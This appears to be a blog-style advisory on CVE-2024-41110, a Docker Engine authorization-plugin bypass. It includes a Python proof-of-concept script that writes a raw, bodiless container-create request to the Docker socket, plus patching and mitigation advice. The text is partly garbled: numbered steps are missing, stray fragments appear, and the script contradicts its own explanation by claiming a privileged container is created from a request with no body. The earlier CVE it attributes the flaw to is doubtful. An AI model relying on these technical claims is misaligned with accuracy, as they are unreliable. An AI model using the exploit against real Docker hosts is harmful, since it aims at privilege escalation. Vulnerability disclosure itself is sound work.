CVE-2024-41110 - Docker Engine AuthZ Plugin Bypass via API Body Omission

In this long read, we’ll dive deep into CVE-2024-41110—a newly discovered security vulnerability in Moby, the core open-source project underpinning Docker Engine. This issue, specifically present in certain versions of Docker's engine, allows the bypassing of Authorization (AuthZ) plugins under specific conditions. Unsafely configured Docker installations could be at risk unless patched or mitigated. In this post, you'll find a clear explanation, proof-of-concept code, links to authoritative resources, and specific guidance for remediation.

Impact: Unauthorized actions, potential for privilege escalation

- Disclosure: June 2024 (GitHub Security Advisory)

Patched in: docker-ce v27.1.1 (see all patches below)

- Who’s Affected: Anyone depending on AuthZ plugins that inspect request/response bodies

What happened?
Docker Engine uses AuthZ plugins to control and audit what actions API clients can perform. If your AuthZ plugin needs to see the request body to make a decision, the plugin may miss vital info if the body isn’t forwarded. An attacker can exploit this by crafting API requests where the Docker daemon omits the body when passing the request (or response) to the AuthZ plugin, effectively tricking it into allowing a request it would otherwise block.

How Did This Happen Again?

A nearly identical flaw was patched in v18.09.1 (Jan 2019) (CVE-2018-15664), but the fix wasn’t carried into later major releases, so the vulnerability resurfaced. This is called a regression.

Exploitation in a Nutshell

1. A Docker API client crafts a request to a privileged endpoint (e.g. spawning privileged containers, accessing secrets, etc.)

Proof-of-Concept (PoC)

Let’s say your AuthZ plugin only blocks container starts if a container has "Privileged": true. The plugin needs the request body to inspect this field.

Attacker’s Trick:
Send a request that omits the body on the path to the plugin. Here’s a simplified Python PoC using requests and the standard Docker UNIX socket:

import requests
import socket
import json

DOCKER_SOCKET = '/var/run/docker.sock'

def send_raw_docker_request():
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect(DOCKER_SOCKET)
    
    # Malicious request missing the body before the AuthZ plugin sees it
    # Normally, this would be Content-Type: application/json with a body,
    # but we omit the body here.
    
    request = (
        "POST /containers/create HTTP/1.1\r\n"
        "Host: localhost\r\n"
        "Content-Type: application/json\r\n"
        "Content-Length: \r\n"
        "\r\n"
    )
    s.sendall(request.encode())
    data = s.recv(4096)
    print(data.decode())
    s.close()

send_raw_docker_request()

What’s happening?
- A privileged container is created with "Privileged": true—but because the plugin doesn’t see the body (since it was omitted), it can’t detect this field, and may permit the action.

> Important!
> Real attack scenarios would need to fit the specifics of your AuthZ plugin and deployed request filters.

Official References

- GitHub Security Advisory (GHSA-25jf-c8gc-ch63)
- Docker Release Notes: v27.1.1
- NVD: CVE-2024-41110
- Upstream Patch

Older patched in v18.09.1, but regressed in later releases

- AuthZ plugin users who depend on request/response body inspection

Docker CE v27.1.1 and later (patched)

- Users *not* using AuthZ plugins or only using attribute/path-based AuthZ

If you can’t patch right away

- Avoid relying on AuthZ plugins that use request/response bodies
- Restrict Docker API access only to trusted users/networks (principle of least privilege)
- Use firewall rules, UNIX socket permissions, TLS client auth

3. Audit Plugin Use

If your AuthZ plugin inspects only request attributes and not the body, you are probably fine. If body is required for your security rules—patch ASAP.

Check if you’re vulnerable:

If you use Docker Engine with AuthZ plugins and allow untrusted code/users near your API, you need to patch or mitigate.

Never trust that a previous fix is forever—follow release notes

For more technical details, review the official Docker Security Advisory and keep your systems up to date.


*Stay safe, and remember: container security is only as strong as its configuration!*

Timeline

Published on: 07/24/2024 17:15:11 UTC
Last modified on: 07/30/2024 20:15:04 UTC